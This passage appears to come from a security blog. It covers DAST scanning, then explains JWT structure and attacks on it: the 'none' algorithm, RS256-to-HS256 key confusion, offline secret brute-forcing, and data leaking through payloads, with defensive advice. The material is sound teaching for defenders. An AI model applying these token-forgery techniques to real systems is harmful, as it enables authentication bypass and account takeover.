Once inputs are defined, an active scan phase begins. Numerous requests are sent to the application to detect deviations from expected results. While DAST is essential for application security testing it cannot provide a complete overview of all vulnerabilities. Unfortunately, not all found bugs are vulnerabilities, DAST tools can generate a lot of false positives. However, confirmed issues can often be easily re-tested.

DAST tools operate in runtime, they work the best to find authentication, session management, and access control issues. Because it is a black box testing with no  knowledge of the context, some issues can be related to using 3rd party components. Various misconfigurations can also be found only in runtime.

DAST is also effective as a static code analyzer for finding different injection issues. The most notorious are SQL injections, Cross-site scripting, and OS command injections. Buffer overflow is another critical vulnerability that can be found with DAST  fuzzing user input and sending a specific combination of characters to crash an application.

Effectiveness of DAST depends on how well it knows the application and the number of tests that will be performed.  It does not work as fast as static code analyzers and it requires a working environment, but it is still a great way to test the whole application from an attacker’s perspective. 

Security Issues in JWT Authentication

What is JWT Authentication?

JSON Web Token (JWT) is a JSON encoded representation of a claim(s) that can be transferred between two parties. The claim is digitally signed by the issuer of the token, and the party receiving this token can later use this digital signature to prove the ownership on the claim.

JWTs can be broken down into three parts: header, payload, and signature. Each part is separated from the other by dot (.), and will follow the below structure:

Header.Payload.Signature

HEADER

The information contained in the header describes the algorithm used to generate the signature. The decoded version of the header from the above example looks like:

{

 “alg”: “HS256”,

 “typ”: “JWT”

}

HS256 is the hashing algorithm HMAC SHA-256 used to generate the signature in the above example.

PAYLOAD


All the claims within JWT authentication are stored in this part. Claims are used to provide authentication to the party receiving the token. For example, a server can set a claim saying ‘isAdmin: true’ and issue it to an administrative user upon successfully logging into the application. The admin user can now send this token in every consequent request he/she sends to the server to prove their identity.

The decoded version of the payload from the JWT example provided above looks like:

{

 “sub”: “1234567890”,

 “name”: “John Doe”,

 “iat”: 1516239022

}

The ‘name’ field is used to identify the user to whom the token was issued to. The ‘sub’ and ‘iat’ are examples of registered claims and are short for ‘subject’ and ‘issued at’.

SIGNATURE


The signature part of a JWT is derived from the header and payload fields. The steps involved in creating this signature are described below:

1. Combine the base64url encoded representations of header and payload with a dot (.)

base64UrlEncode(header) + “.” + base64UrlEncode(payload)
 
2. Hash the above data with a secret-key only known to the server issuing the token. The hashing algorithm is the one described inside the header.

hash_value = hash([base64UrlEncode(header) + “.” + base64UrlEncode(payload)], secret-key)

3. Base64Url encode the hash value obtained from the step above

Signature = base64UrlEncode(hash_value)

Because the ‘secret-key’ is only known to the server, only it can issue new tokens with a valid signature. Users can not forge tokens as producing a valid Signature for the token requires the knowledge of the ‘secret-key’.

JWT find their applications in various authentication mechanisms. These are typically passed in the Authorization header when a user submits a request to the client.

eg:
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0I joxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

jwt authentication use case

Attacks Against JWT?

Tampering with the Signing Algorithm:

‘none’ algorithm: JWT supports the usage of ‘none’ algorithm for use-cases where the integrity of the claim within JWT is already verified by other means. This algorithm allows the server to issue a JWT without a signature. The content within a token issued with a ‘none’ algorithm will look like the following:

 

 {“alg”:”none”,”typ”: “JWT”}.{“sub”:”1234567890″,”name”:”John Doe”,”iat”: 1516239022}.

It is worth noting that the ‘none’ algorithm along with ‘HMAC SHA-256 (HS256)’ are the only two algorithms that are mandatory to implemented according to the JWT standard.(1

Attackers can use this feature to set the algorithm in their token to ‘none’ and provide an empty signature to fool the server into accepting it as a valid token. However, most of the modern implementations now have an added security check that rejects tokens set with ‘none’ algorithm when a secret-key was used to issue them.

RS256 to HS256: JWT supports the usage of asymmetric signing algorithms such as RS256 which uses a private key to sign the token and a public key to verify the signature. The private key is only known to the server and the public key is accessible to everyone.

The use of asymmetric signing algorithms is useful in situations where 3rd party clients need to verify the validity of a JWT not issued by them. A server signing JWTs with a symmetric algorithm such as HS256 will have to share the secret-key with all the 3rd party clients that want verify the token. This increases the risk of secret-key being disclosed.

In insecure implementations where the server trusts the data inside the header of a JWT and doesn’t validate the algorithm it used to issue a token, attackers can change the algorithm from ‘RS256’ to ‘HS256’ and use the ‘public’ key to generate a HMAC signature for the token. The server will now treat this token as one generated with ‘HS256’ algorithm and use its public key to decode and verify it.

Brute-Forcing HS256:
JWTs signed with HS256 algorithm could be vulnerable to secret-key disclosure. that usually happens through brute-force attacks, especially for weak keys. Since a client does not need to interact with the server to check the validity of secret-key after a token is issued by the server, attackers can conduct offline brute-force attacks against the token by using wordlists of possible secret-keys.   

It is recommended to use sufficiently long (256 bit) keys to safeguard against these attacks.

Sensitive Information disclosure:
All the information inside the payload is stored in plain text. It is important not to leak sensitive information such as internal IP addresses through the tokens.  

Attacks against JWT arise from bad implementations and using outdated libraries. To benefit from the security features JWT offers, follow the best practices for implementing them, only use up-to-date and secure libraries and choose the right algorithm for your use-case.

Here is a short video of how  and why JWT is created, and where it is used:

Was this article helpful?